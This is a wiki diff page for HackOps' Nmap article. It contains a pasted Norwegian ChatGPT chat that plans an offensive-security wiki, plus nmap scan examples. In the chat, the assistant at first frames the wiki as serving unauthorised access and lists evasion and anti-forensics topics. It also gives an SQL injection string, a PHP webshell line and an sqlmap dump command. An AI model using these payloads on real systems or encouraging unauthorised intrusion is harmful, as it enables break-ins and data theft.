Nmap: Difference between revisions

From HackOps
Jump to navigation Jump to search
← Older editNewer edit →
VisualWikitext
No edit summary
Tag: Reverted
Undo revision 35 by Vegard (talk)
Tags: Replaced Undo
Line 1: Line 1:
Skip to content
You said:
Hva er forskjellen på red team ig penetrasjonstesting?
ChatGPT said:
Forskjellen mellom red teaming og penetrasjonstesting handler hovedsakelig om mål, metode og omfang:
1. Mål
    Penetrasjonstesting:
    Målet er å finne så mange sårbarheter som mulig i et spesifikt system eller applikasjon. Det handler om teknisk testing, ofte med full tillatelse og rammer definert på forhånd.
    Red Teaming:
    Målet er å simulere et ekte angrep for å teste deteksjon og respons hos den blå siden (defensive teamet). Fokus er ikke å finne alle svakheter, men å demonstrere hvordan en angriper faktisk kan nå et kritisk mål (f.eks. få tilgang til en sensitiv database, exfiltrere data, eller "capture the flag").
2. Metodikk og tilnærming
    Penetrasjonstesting:
        Bruker ofte automatiserte verktøy kombinert med manuelle tester.
        Tester spesifikke IP-er, systemer, webapper, osv.
        Har som regel en varighet på dager til få uker.
    Red Teaming:
        Langsiktig og stealthy.
        Kombinerer tekniske angrep (exploits) med sosial manipulasjon (phishing, pretexting).
        Angriper fra utsiden – ofte uten at blå team vet at det pågår en test.
        Kan bruke “low and slow” taktikk over uker eller måneder.
3. Omfang og realisme
    Penetrasjonstesting:
        Begrenset og definert scope. Kunden vet hva som testes og når.
        Ofte ingen sosial manipulering.
        Rapporterer alle funn og sårbarheter.
    Red Teaming:
        Hele organisasjonen er i spill (mennesker, prosesser, systemer).
        Simulerer en ekte trusselaktør (APT, ransomware-gjeng, insider, etc.).
        Brukes ofte for å teste “detection and response” – altså hvor godt organisasjonen oppdager og reagerer på angrep.
Kort sagt:
Egenskap Penetrasjonstest Red Teaming
Mål Finne sårbarheter Teste forsvarsevne mot ekte angrep
Varighet Dager til få uker Flere uker til måneder
Synlighet Offentlig for IT-sikkerhetsteam Skjult for organisasjonen
Scope Begrenset (f.eks. webapp) Hele organisasjonen (endepunkt, mennesker, prosesser)
Angrepsmetode Teknisk Teknisk + sosial manipulering
Rapportfokus Alle sårbarheter Om man nådde målet
Ønsker du eksempler på når man bruker det ene vs. det andre?
You said:
Hackops.wiki, vil du definert den som red team eller penetrasjonstesting?
Jeg vil at den skal forklare hva en enkelt hacker kan gjøre for å oppnå innsyn inn i systemer man ikke har itlgang til
Kan det være at det ikke faller under noen av temaene?
GI et objektivt svar.
ChatGPT said:
Objektivt sett: HackOps.wiki – slik du beskriver det – passer ikke presist inn i verken "penetrasjonstesting" eller "red teaming" i sin helhet, fordi begge er formelle sikkerhetstjenester innenfor organisasjoner. I stedet representerer prosjektet ditt noe mer grunnleggende og uavhengig, som heller kan kategoriseres slik:
🎯 Primær kategori:
Offensiv sikkerhet / Ethical hacking
Dette er paraplybegrepet som inkluderer både red teaming og penetrasjonstesting, men også individuell læring, hobbyprosjekter og uautoriserte simuleringer. HackOps.wiki faller her.
🧭 Mer presis underkategori:
    Adversarial simulation (fra et individ-perspektiv):
    Du beskriver hvordan en enkelt person, uten formell tilgang, kan forstå og bryte seg inn i systemer. Det ligner på TTP-er (tactics, techniques, procedures) brukt av ekte angripere.
    OSINT + Initial Access + Privilege Escalation + Persistence:
    Basert på hva HackOps.wiki ønsker å vise, dekker den mest sannsynlig hele kill chain-en, og dermed flere faser av angrepsmodellen (MITRE ATT&CK eller Lockheed Martin Cyber Kill Chain).
🛑 Hva det ikke er:
    Red Teaming:
    Red teaming krever blå team, regler og mål. Det HackOps gjør er ikke en organisasjonsbasert simulering, men et kunnskapsgrunnlag for enkeltpersoners innsyn og teknisk infiltrasjon.
    Penetrasjonstesting:
    HackOps har ikke fokus på rapportering, revisjon, og systematisk sårbarhetsdekning, som kreves av pen-testing.
🧠 Klassifisering for HackOps.wiki:
== Tema: Offensiv sikkerhet ==
HackOps.wiki er en kunnskapsbase for enkeltpersoner som ønsker å forstå og utforske hvordan man teknisk og metodisk kan oppnå uautorisert tilgang til digitale systemer.
Den fokuserer ikke på godkjent sikkerhetstesting (som red teaming eller pentesting), men snarere på hvordan reelle angripere tenker og opererer, steg for steg.
Relevante stikkord:
- Reconnaissance
- OSINT
- Initial Access Techniques
- Exploitation
- Pivoting
- Post-Exploitation
- Persistence
- Evasion
Vil du at jeg skal foreslå en god "hovedkategori" og "underkategorier" for dette i wikisystemet ditt?
You said:
ja
ChatGPT said:
Her er et strukturert forslag til hvordan du kan organisere HackOps.wiki under én hovedkategori med underkategorier, tilpasset målet: å vise hvordan en enkelt hacker kan skaffe seg innsyn i systemer uten tilgang.
🧩 Hovedkategori: Offensiv sikkerhet
    Beskrivelse:
    En samling teknikker, verktøy og strategier brukt for å oppnå uautorisert tilgang – ikke som en øvelse i revisjon, men som en simulering av ekte trusselaktørers fremgangsmåter. Fokus ligger på kunnskap, ikke formell tillatelse.
📂 Underkategorier
1. Recon / Targeting
    Målkartlegging via OSINT, whois, shodan, dorks
    Identifisering av angrepsflater (IP, subdomener, ansatte)
    Verktøy: theHarvester, amass, Maltego
2. Initial Access
    Phishing, credentials stuffing, exposed panels
    Utnyttelse av feilkonfigurasjoner
    Verktøy: Metasploit, Hydra, Nmap, Searchsploit
3. Vulnerability Exploitation
    Utnyttelse av CVE-er eller ukjente svakheter
    Manuelle angrep (LFI, RCE, SQLi, etc.)
    Eksempler på exploits i praksis
4. Privilege Escalation
    Fra low-priv shell til root/system
    SUID, token misbruk, unpatched services
    Verktøy: linPEAS, winPEAS, GTFOBins
5. Post-Exploitation
    Dumping av credentials
    Nettverkskartlegging og pivoting
    Filtrering og tolkning av funn
6. Persistence
    Bruk av cron, autoruns, WMI, backdoors
    Hvordan opprettholde tilgang over tid
    Bypassing AV/EDR
7. Exfiltration & Impact
    Dataoverføring (f.eks. scp, exfil via DNS)
    Opprettelse av command-and-control-kanaler
    Sluttmål: få innsikt, ta over, påvirke systemet
8. Stealth & Evasion
    Loggmanipulering, anti-forensics
    Bypasse antivirus og nettverksovervåkning
    Verktøy: obfuscator, veil, mimikatz
📌 Mulig ekstra:
Live Attacks / Walkthroughs
    Eksempler fra CTF-er, ekte hackerangrep eller simuleringer
    Steg-for-steg-scenarier
Hacking Philosophy
    Hackeretikken, psykologien bak offensive security
    Anonymitet, operational security (OPSEC), mindsets
Vil du ha dette som en tekstfil, markdown for wiki, eller direkte inn i en [title] / [box] struktur?
You said:
HackOps.wiki is an open and structured knowledge base focused on documenting how hackers operate in practice—through tools, techniques, and workflows used in real-world offensive cybersecurity.
This site does not cover, promote, or support:
    Physical intrusion methods (e.g. lockpicking)
    Psychological or social manipulation tactics
    Productivity tips or general life hacks
    Any use of unauthorized or illegal access techniques
All content is provided for educational use in controlled environments where permission to test systems has been granted.
It is intended for students, professionals, and self-learners who want to explore how attackers think, operate, and break systems—legally and responsibly. Readers are encouraged to use this knowledge to strengthen systems, train responsibly, and think like an attacker in order to defend like one.
passer denne for TTP beskrivelsen? er det definisjoen vi har valgt?
OSINT + Initial Access + Privilege Escalation + Persistence:
Adversarial simulation (fra et individ-perspektiv):
vi bruker disse som utgangspunkt
ChatGPT said:
Ja – teksten du har skrevet passer godt som en overordnet introduksjon for HackOps.wiki og stemmer overens med TTP-beskrivelsen du ønsker å bygge ut fra. Den balanserer pedagogisk formidling med etisk ansvar, og plasserer prosjektet innenfor rammen av adversarial simulation fra et individ-perspektiv.
Hvorfor dette passer:
    ✅ TTP-fokus:
    Teksten viser tydelig at innholdet handler om hvordan angripere faktisk opererer i praksis – altså tactics, techniques, and procedures (TTPs). Dette matcher:
        OSINT
        Initial Access
        Privilege Escalation
        Persistence
            resten av kill chain-en
    ✅ Adversarial simulation (individ-perspektiv):
    Du understreker at det er for læring, ikke profesjonell red teaming – men likevel med realistiske scenarier. Dette skiller det fra “formell pentest” og passer perfekt i en selvstendig kontekst.
    ✅ Etisk ramme:
    Du markerer tydelig at innholdet kun er for bruk der tillatelse foreligger. Dette er nødvendig for å være pedagogisk forsvarlig og lovlig, samtidig som det åpner for avanserte teknikker.
    ✅ Hva det ikke er:
    Du avgrenser tydelig mot ting som:
        Fysisk adgang
        Social engineering
        Livsstilstips
        Dette gjør det skarpt og tematisk rendyrket.
Mulig forbedring for presis rollebeskrivelse (valgfritt):
Hvis du ønsker å tydeliggjøre TTP-vinklingen enda mer, kan du legge til én ekstra setning i innledningen:
    “It focuses on attacker Tactics, Techniques, and Procedures (TTPs) across phases like reconnaissance, initial access, privilege escalation, persistence, and post-exploitation.”
Konklusjon:
✔ Ja – teksten representerer tydelig TTP-basert offensiv sikkerhet
✔ Ja – det stemmer med valget ditt: “Adversarial simulation fra et individ-perspektiv”
Vil du at jeg skal sette opp en startside-struktur basert på dette som kan brukes i wiki’en din?
You said:
få dette inn her:
<div style="background:#1a1a1a; border: 1px solid #333; padding:1em; border-left: 4px solid #ff5555; margin-bottom: 20px; max-width: 800px; margin-left:auto; margin-right:auto;">
<div style="text-align:center;">
'''HackOps.wiki''' is an open and structured knowledge base focused on documenting how hackers operate in practice—through tools, techniques, and workflows used in real-world offensive cybersecurity.
</div>
<div style="text-align:center; margin-top:1em;">
''This site does not cover, promote, or support:''
</div>
<ul style="display: table; margin: 0 auto; text-align: left;">
  <li>Physical intrusion methods (e.g. lockpicking)</li>
  <li>Psychological or social manipulation tactics</li>
  <li>Productivity tips or general life hacks</li>
  <li>Any use of unauthorized or illegal access techniques</li>
</ul>
<div style="text-align:center; margin-top:1em;">
All content is provided for educational use in controlled environments where permission to test systems has been granted.
It is intended for students, professionals, and self-learners who want to explore how attackers think, operate, and break systems—legally and responsibly. Readers are encouraged to use this knowledge to strengthen systems, train responsibly, and think like an attacker in order to defend like one.
</div>
ChatGPT said:
Her er hele blokken med setningen om TTP-er og fasene tydelig lagt inn i midten, uten å bryte layouten:
<div style="background:#1a1a1a; border: 1px solid #333; padding:1em; border-left: 4px solid #ff5555; margin-bottom: 20px; max-width: 800px; margin-left:auto; margin-right:auto;">
<div style="text-align:center;">
'''HackOps.wiki''' is an open and structured knowledge base focused on documenting how hackers operate in practice—through tools, techniques, and workflows used in real-world offensive cybersecurity.
</div>
<div style="text-align:center; margin-top:1em;">
It focuses on attacker Tactics, Techniques, and Procedures (TTPs) across phases like reconnaissance, initial access, privilege escalation, persistence, and post-exploitation.
</div>
<div style="text-align:center; margin-top:1em;">
''This site does not cover, promote, or support:''
</div>
<ul style="display: table; margin: 0 auto; text-align: left;">
  <li>Physical intrusion methods (e.g. lockpicking)</li>
  <li>Psychological or social manipulation tactics</li>
  <li>Productivity tips or general life hacks</li>
  <li>Any use of unauthorized or illegal access techniques</li>
</ul>
<div style="text-align:center; margin-top:1em;">
All content is provided for educational use in controlled environments where permission to test systems has been granted.
<br><br>
It is intended for students, professionals, and self-learners who want to explore how attackers think, operate, and break systems—legally and responsibly. Readers are encouraged to use this knowledge to strengthen systems, train responsibly, and think like an attacker in order to defend like one.
</div>
</div>
Vil du også at jeg skal lage en tilsvarende [box]-versjon for bruk i din pseudo-parser?
You said:
kan du gi meg korte konkrete eksempel på hva:
It focuses on attacker Tactics, Techniques, and Procedures (TTPs) across phases like reconnaissance, initial access, privilege escalation, persistence, and post-exploitation.
er
ChatGPT said:
Absolutt. Her er korte, konkrete eksempler for hver fase:
Reconnaissance (rekognosering):
Finn ansatte på LinkedIn og bruk theHarvester for å samle e-poster.
Initial Access (første tilgang):
Bruk en phishing-side som etterligner Office365 for å stjele innloggingsdetaljer.
Privilege Escalation (privilegieøkning):
Kjør linPEAS på en Linux-server og oppdag en SUID-root binær som kan misbrukes til root-tilgang.
Persistence (vedvarende tilgang):
Opprett en cron-jobb som automatisk starter en reverse shell ved reboot.
Post-Exploitation (etter utnyttelse):
Dump ut lagrede passord fra Google Chrome eller LSASS med mimikatz.
Ønsker du disse integrert i wiki-siden din med [box]-struktur også?
You said:
gi eks på web
ChatGPT said:
Her er korte og konkrete TTP-eksempler rettet mot webapplikasjoner for hver fase:
🔍 Reconnaissance (Web)
Bruk sublist3r eller amass for å finne subdomener som dev.site.com eller admin.site.com.
🔓 Initial Access (Web)
Utnytt en SQL-injeksjon på login.php for å logge inn uten passord.
' OR '1'='1 --
⬆️ Privilege Escalation (Web)
Et lavprivilegert brukerpanel gir tilgang til en uautorisert admin-side via direkte URL-manipulasjon (IDOR):
/admin/settings.php
🔁 Persistence (Web)
Last opp en PHP-webshell via en dårlig sikret filopplasting:
<?php system($_GET['cmd']); ?>
📤 Post-Exploitation (Web)
Les databasen med sqlmap og eksporter brukernavn og passordhashes:
sqlmap -u "https://target.com/products.php?id=1" --dump
Vil du at jeg formatterer disse som [box]-elementer for HackOps-wiki også?
You said:
faller disse under beskrivelsen for ttp og It focuses on attacker Tactics, Techniques, and Procedures (TTPs) across phases like reconnaissance, initial access, privilege escalation, persistence, and post-exploitation.
Basic Linux Commands Essential command-line usage for navigation, enumeration, and manipulation Core Skill
Basic Windows Commands Using Windows CLI (CMD/PowerShell) for system analysis and manipulation Core Skill
Networking Concepts Understanding IP, ports, protocols, DNS, routing, and packet behavior Foundation for Recon and Exploitation
Scripting Basics Automating tasks, parsing output, and writing exploits using Bash, Python, or PowerShell Automation / Exploit Customization
Command Line Usage Efficient use of shell environments across platforms Universal Interface for Hacking
File & Process Handling Managing files, permissions, running processes, and services Local System Interaction
Encoding & Decoding Working with Base64, hex, URL encoding, and other transformations Payload Crafting / Obfuscation
Information Gathering Active and passive recon, subdomain mapping, fingerprinting Pre-Attack
Social Engineering Psychological manipulation, phishing, and human-layer attacks Human Attack Vector
Initial Access Phishing, exposed services, stolen credentials, misconfigurations Entry Point
Vulnerability Analysis Identifying and assessing weaknesses in systems and services Assessment
Web Applications Attacking common web vulnerabilities like XSS, LFI, SQLi Attack Surface
Exploitation Tools Frameworks and scripts used to trigger and exploit vulnerabilities Execution
Custom Exploits & Scripting Tailoring attack logic to exploit non-standard vulnerabilities Adaptation / Creativity
Payload Development Generating shellcode and evasive payloads for specific contexts Execution / Obfuscation
Password Attacks Brute-force, dictionary, and credential stuffing techniques Credential Access
Wireless Attacks Targeting Wi-Fi protocols, access points, and wireless devices Entry Point
Sniffing & Spoofing Capturing traffic and falsifying identity on a network Surveillance / Evasion
Privilege Escalation Gaining higher privileges on compromised systems Post-Exploitation
Maintaining Access Persistence, backdoors, and evasion after initial compromise Post-Exploitation
Tunneling & Covert Channels Data exfiltration and access via concealed paths Evasion / Command & Control
Red Team Tactics Full-scale simulation, stealth operations, and adversary emulation Simulation / Strategy
Reporting Tools Documentation and reporting techniques for professional pentesters Output / Professionalism
CTF Walkthroughs Writeups, tutorials, and solutions for training platforms Learning / Practice
ChatGPT said:
Ja – alle punktene du nevner faller enten direkte inn under TTP-beskrivelsen, eller er essensielle støtteferdigheter som muliggjør effektiv bruk av TTP-er. Her er en tydelig klassifisering:
✅ Direkte TTP-faser (som beskrevet i setningen)
Disse matcher direkte faser som reconnaissance, initial access, privilege escalation, persistence og post-exploitation:
Emne TTP-fase(r)
Information Gathering Reconnaissance (Pre-Attack)
Initial Access Initial Access
Privilege Escalation Privilege Escalation
Maintaining Access Persistence
Tunneling & Covert Channels Post-Exploitation / Command & Control
Web Applications Initial Access / Exploitation
Vulnerability Analysis Reconnaissance / Exploitation
Password Attacks Initial Access / Privilege Escalation
Exploitation Tools Initial Access / Execution
Custom Exploits & Scripting Exploitation / Adaptation
Payload Development Exploitation / Obfuscation
Wireless Attacks Recon / Initial Access
Sniffing & Spoofing Recon / Evasion / Post-Exploitation
⚙️ Core Skills som støtter TTP-bruk (understøttende ferdigheter)
Disse er ikke TTP-er i seg selv, men trengs for å gjennomføre TTP-er effektivt:
Emne Relevans for TTP
Basic Linux Commands Nødvendig for recon, privilege escalation, post-ex
Basic Windows Commands Samme som over, på Windows
Command Line Usage Universal – brukt i alle TTP-faser
File & Process Handling Brukes i privilege escalation, persistence
Scripting Basics Automatisering av TTP-er, utvikling av exploits
Encoding & Decoding Brukes i payload crafting, C2-kanaler, evasion
🧠 Metaferdigheter / verktøy utenfor TTP-fasene direkte
Disse er utenfor selve kjeden, men fortsatt relevante:
Emne Kommentar
Social Engineering Ikke teknisk TTP i wiki’en (du har valgt å ekskludere det)
Red Team Tactics Overbygning – dekker TTP-er i en simulert kontekst
Reporting Tools Etterarbeid / profesjonell praksis
CTF Walkthroughs Læringsverktøy – praktisk øvelse i TTP-er
📌 Konklusjon:
    Ja, hele listen kan rettferdig plasseres innenfor eller rundt TTP-beskrivelsen din.
    Teksten “It focuses on attacker Tactics, Techniques, and Procedures (TTPs)…” er bred nok til å inkludere både de konkrete angrepsfasene og de tekniske forutsetningene som kreves for å utføre dem.
Ønsker du dette visualisert som et hierarki med Core, TTP, Support, Excluded i et diagram eller i wiki-struktur?
You said:
r det noe essensielt jeg mangler?
ChatGPT said:
Ja – du har allerede dekket det meste av det som trengs for å dokumentere TTP-basert hacking, men her er en punktvis liste over essensielle områder som enten er underrepresentert eller kan forbedres basert på din nåværende struktur:
✅ Allerede godt dekket:
    Reconnaissance, Initial Access, Privilege Escalation, Persistence, Post-Exploitation
    Web exploits, password attacks, tunneling, evasion
    Core skills i Windows/Linux CLI, scripting, encoding
    Læringsmetoder som CTF og rapportering
🔶 Forslag til forbedring eller tillegg:
1. Lateral Movement
    Etter initial access og privilege escalation – hvordan beveger man seg fra én maskin til en annen i samme nettverk?
    Eksempel: PsExec, pass-the-hash, RDP brute, RPC abuse
    Viktig for realistiske etterligninger av angrep i interne nettverk
    Faller under post-exploitation
2. Active Directory (AD) Attacks
    Enorme mengder angrep skjer mot AD-miljøer
    Eksempel: Kerberoasting, AS-REP roasting, BloodHound-analyser
    Brukes i både privilege escalation og lateral movement
    Bør være egen seksjon, da det er en sentral del av enterprise-angrep
3. Operational Security (OPSEC) for Hackers
    Hvordan beskytte seg selv mens man hacker (lovlig/lab)
    Eksempel: bruk av proxychains, Tails, VPN, log cleaning
    Går hånd i hånd med stealth og evasion
4. Command & Control (C2) Infrastructure
    Hvordan fjernstyre kompromitterte maskiner etter initielt brudd?
    Eksempel: Cobalt Strike, Mythic, Empire, DIY C2 med flask + ngrok
    Kombinerer persistence og post-exploitation
    Gir kontekst til tunneling/covert channels
5. Linux Post-Exploitation
    Det meste handler ofte om Windows – men du bør ha en egen seksjon for Linux
    Eksempel: sudo -l, crontab abuse, ssh-agent hijack, journald misbruk
    Også: systeminfo, passwd shadow, cron-persistence
6. Cloud & SaaS Attacks (valgfritt men aktuelt)
    Mange systemer er i dag skybaserte. Dokumentasjon av angrep på f.eks. AWS, Azure, GCP.
    Eksempel: AWS keys enumeration, misconfigured S3 buckets
    Kan være en egen underkategori
7. Defense Evasion & Anti-Forensics
    Hvordan unngå deteksjon og skjule spor
    Eksempel: Clear-EventLog, timestomping, auditd bypass
    Kombineres med OPSEC, men fortjener en teknisk kategori
🧱 Oppsummering: Legg til eller styrk disse seksjonene:
Tema Hvorfor det er viktig
Lateral Movement Realistisk post-exploitation i interne nettverk
Active Directory Attacks Høyst relevant for enterprise environments
OPSEC for Hackers Kritisk for stealth og bevisst ferdsel
Command & Control (C2) Helhetlig forståelse av kompromiss-vedlikehold
Linux Post-Exploitation Balansere mot alt Windows-basert innhold
Cloud Attacks Fremtidsrettet og realistisk i moderne miljøer
Anti-Forensics / Evasion Realistiske teknikker for å unngå oppdagelse
Vil du at jeg setter opp dette som ny wiki-structure i [title], [box] eller en visuell oversikt?
You said:
implementer disse kategorisk der de passer inn her:
== 📂 Categories ==
{| class="wikitable" style="width:100%; text-align:center; background:#1c1c1c; color:#e0e0e0;"
! Section !! Purpose !! Function
|-
| '''[[Basic Linux Commands]]''' || Essential command-line usage for navigation, enumeration, and manipulation || Core Skill
|-
| '''[[Basic Windows Commands]]''' || Using Windows CLI (CMD/PowerShell) for system analysis and manipulation || Core Skill
|-
| '''[[Networking Concepts]]''' || Understanding IP, ports, protocols, DNS, routing, and packet behavior || Foundation for Recon and Exploitation
|-
| '''[[Scripting Basics]]''' || Automating tasks, parsing output, and writing exploits using Bash, Python, or PowerShell || Automation / Exploit Customization
|-
| '''[[Command Line Usage]]''' || Efficient use of shell environments across platforms || Universal Interface for Hacking
|-
| '''[[File & Process Handling]]''' || Managing files, permissions, running processes, and services || Local System Interaction
|-
| '''[[Encoding & Decoding]]''' || Working with Base64, hex, URL encoding, and other transformations || Payload Crafting / Obfuscation
|-
| '''[[Information Gathering]]''' || Active and passive recon, subdomain mapping, fingerprinting || Pre-Attack
|-
| '''[[Social Engineering]]''' || Psychological manipulation, phishing, and human-layer attacks || Human Attack Vector
|-
| '''[[Initial Access]]''' || Phishing, exposed services, stolen credentials, misconfigurations || Entry Point
|-
| '''[[Vulnerability Analysis]]''' || Identifying and assessing weaknesses in systems and services || Assessment
|-
| '''[[Web Applications]]''' || Attacking common web vulnerabilities like XSS, LFI, SQLi || Attack Surface
|-
| '''[[Exploitation Tools]]''' || Frameworks and scripts used to trigger and exploit vulnerabilities || Execution
|-
| '''[[Custom Exploits & Scripting]]''' || Tailoring attack logic to exploit non-standard vulnerabilities || Adaptation / Creativity
|-
| '''[[Payload Development]]''' || Generating shellcode and evasive payloads for specific contexts || Execution / Obfuscation
|-
| '''[[Password Attacks]]''' || Brute-force, dictionary, and credential stuffing techniques || Credential Access
|-
| '''[[Wireless Attacks]]''' || Targeting Wi-Fi protocols, access points, and wireless devices || Entry Point
|-
| '''[[Sniffing & Spoofing]]''' || Capturing traffic and falsifying identity on a network || Surveillance / Evasion
|-
| '''[[Privilege Escalation]]''' || Gaining higher privileges on compromised systems || Post-Exploitation
|-
| '''[[Maintaining Access]]''' || Persistence, backdoors, and evasion after initial compromise || Post-Exploitation
|-
| '''[[Tunneling & Covert Channels]]''' || Data exfiltration and access via concealed paths || Evasion / Command & Control
|-
| '''[[Red Team Tactics]]''' || Full-scale simulation, stealth operations, and adversary emulation || Simulation / Strategy
|-
| '''[[Reporting Tools]]''' || Documentation and reporting techniques for professional pentesters || Output / Professionalism
|-
| '''[[CTF Walkthroughs]]''' || Writeups, tutorials, and solutions for training platforms || Learning / Practice
|}
----
ChatGPT said:
Her er den utvidede == 📂 Categories ==-tabellen med de 7 manglende og essensielle kategoriene riktig plassert, tematisk og logisk integrert med eksisterende struktur:
== 📂 Categories ==
{| class="wikitable" style="width:100%; text-align:center; background:#1c1c1c; color:#e0e0e0;"
! Section !! Purpose !! Function
|-
| '''[[Basic Linux Commands]]''' || Essential command-line usage for navigation, enumeration, and manipulation || Core Skill
|-
| '''[[Basic Windows Commands]]''' || Using Windows CLI (CMD/PowerShell) for system analysis and manipulation || Core Skill
|-
| '''[[Networking Concepts]]''' || Understanding IP, ports, protocols, DNS, routing, and packet behavior || Foundation for Recon and Exploitation
|-
| '''[[Scripting Basics]]''' || Automating tasks, parsing output, and writing exploits using Bash, Python, or PowerShell || Automation / Exploit Customization
|-
| '''[[Command Line Usage]]''' || Efficient use of shell environments across platforms || Universal Interface for Hacking
|-
| '''[[File & Process Handling]]''' || Managing files, permissions, running processes, and services || Local System Interaction
|-
| '''[[Encoding & Decoding]]''' || Working with Base64, hex, URL encoding, and other transformations || Payload Crafting / Obfuscation
|-
| '''[[Information Gathering]]''' || Active and passive recon, subdomain mapping, fingerprinting || Pre-Attack
|-
| '''[[Social Engineering]]''' || Psychological manipulation, phishing, and human-layer attacks || Human Attack Vector
|-
| '''[[Initial Access]]''' || Phishing, exposed services, stolen credentials, misconfigurations || Entry Point
|-
| '''[[Vulnerability Analysis]]''' || Identifying and assessing weaknesses in systems and services || Assessment
|-
| '''[[Web Applications]]''' || Attacking common web vulnerabilities like XSS, LFI, SQLi || Attack Surface
|-
| '''[[Exploitation Tools]]''' || Frameworks and scripts used to trigger and exploit vulnerabilities || Execution
|-
| '''[[Custom Exploits & Scripting]]''' || Tailoring attack logic to exploit non-standard vulnerabilities || Adaptation / Creativity
|-
| '''[[Payload Development]]''' || Generating shellcode and evasive payloads for specific contexts || Execution / Obfuscation
|-
| '''[[Password Attacks]]''' || Brute-force, dictionary, and credential stuffing techniques || Credential Access
|-
| '''[[Wireless Attacks]]''' || Targeting Wi-Fi protocols, access points, and wireless devices || Entry Point
|-
| '''[[Sniffing & Spoofing]]''' || Capturing traffic and falsifying identity on a network || Surveillance / Evasion
|-
| '''[[Privilege Escalation]]''' || Gaining higher privileges on compromised systems || Post-Exploitation
|-
| '''[[Linux Post-Exploitation]]''' || System control, enumeration, and manipulation after compromise || Post-Exploitation
|-
| '''[[Active Directory Attacks]]''' || Exploiting trust relationships and Kerberos-based auth systems || Internal Escalation
|-
| '''[[Lateral Movement]]''' || Expanding control from one system to others in the network || Post-Exploitation / Network Penetration
|-
| '''[[Maintaining Access]]''' || Persistence, backdoors, and evasion after initial compromise || Post-Exploitation
|-
| '''[[Tunneling & Covert Channels]]''' || Data exfiltration and access via concealed paths || Evasion / Command & Control
|-
| '''[[Command & Control Infrastructure]]''' || Remote management of compromised systems || Persistence / Adversary Infrastructure
|-
| '''[[Operational Security (OPSEC)]]''' || Staying hidden, covering tracks, and minimizing exposure || Stealth / Adversarial Hygiene
|-
| '''[[Defense Evasion & Anti-Forensics]]''' || Avoiding detection and erasing digital footprints || Evasion / Obfuscation
|-
| '''[[Cloud Attacks]]''' || Targeting misconfigured or exposed cloud services like AWS and Azure || Attack Surface / Modern Infrastructure
|-
| '''[[Red Team Tactics]]''' || Full-scale simulation, stealth operations, and adversary emulation || Simulation / Strategy
|-
| '''[[Reporting Tools]]''' || Documentation and reporting techniques for professional pentesters || Output / Professionalism
|-
| '''[[CTF Walkthroughs]]''' || Writeups, tutorials, and solutions for training platforms || Learning / Practice
|}
Alle nye temaer er satt inn der de tematisk hører hjemme, og ingen eksisterende struktur er brutt.
Vil du at jeg også lager undersider med [title] og [box]-mal for én av disse nye kategoriene?
You said:
Jeg ønsker at du lager en oversikt over linux kommandoer med utgangspunkt i hvordan nmap strukturen er satt opp:
= Nmap =
= Nmap =


Line 706: Line 21:
|}
|}


=== Host Discovery & Targeting ===
=== Host Discovery & Targeting ===
{| class="wikitable"
{| class="wikitable"
! Option !! Description
! Option !! Description
Line 727: Line 42:




=== Detection & Enumeration ===
=== Detection & Enumeration ===
{| class="wikitable"
{| class="wikitable"
! Option !! Description
! Option !! Description
Line 744: Line 59:
|}
|}


=== Performance & Output ===
=== Performance & Output ===
{| class="wikitable"
{| class="wikitable"
! Option !! Description
! Option !! Description
Line 770: Line 85:
nmap -sS 192.168.1.1
nmap -sS 192.168.1.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-sT"></span>TCP Connect Scan ===
=== <span id="ex-sT"></span>TCP Connect Scan ===
Line 776: Line 91:
nmap -sT 192.168.1.1
nmap -sT 192.168.1.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-sU"></span>UDP Scan ===
=== <span id="ex-sU"></span>UDP Scan ===
Line 782: Line 97:
nmap -sU 192.168.1.1
nmap -sU 192.168.1.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-sP"></span>Ping Scan ===
=== <span id="ex-sP"></span>Ping Scan ===
Line 788: Line 103:
nmap -sP 192.168.1.0/24
nmap -sP 192.168.1.0/24
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-Pn"></span>Skip Host Discovery ===
=== <span id="ex-Pn"></span>Skip Host Discovery ===
Line 794: Line 109:
nmap -Pn 192.168.1.100
nmap -Pn 192.168.1.100
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-p"></span>Scan Specific Ports ===
=== <span id="ex-p"></span>Scan Specific Ports ===
Line 800: Line 115:
nmap -p 22,80 192.168.1.1
nmap -p 22,80 192.168.1.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-A"></span>Aggressive Scan ===
=== <span id="ex-A"></span>Aggressive Scan ===
Line 806: Line 121:
nmap -A 10.0.0.1
nmap -A 10.0.0.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-O"></span>OS Detection Only ===
=== <span id="ex-O"></span>OS Detection Only ===
Line 812: Line 127:
nmap -O 10.0.0.1
nmap -O 10.0.0.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-T"></span>Fast Timing Template ===
=== <span id="ex-T"></span>Fast Timing Template ===
Line 818: Line 133:
nmap -T5 example.com
nmap -T5 example.com
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-script"></span>Run NSE Script ===
=== <span id="ex-script"></span>Run NSE Script ===
Line 824: Line 139:
nmap --script default example.com
nmap --script default example.com
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-iL"></span>Scan From File ===
=== <span id="ex-iL"></span>Scan From File ===
Line 830: Line 145:
nmap -iL targets.txt
nmap -iL targets.txt
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-oN"></span>Save Output (Normal) ===
=== <span id="ex-oN"></span>Save Output (Normal) ===
Line 836: Line 151:
nmap -oN output.txt 192.168.1.1
nmap -oN output.txt 192.168.1.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-oX"></span>Save Output (XML) ===
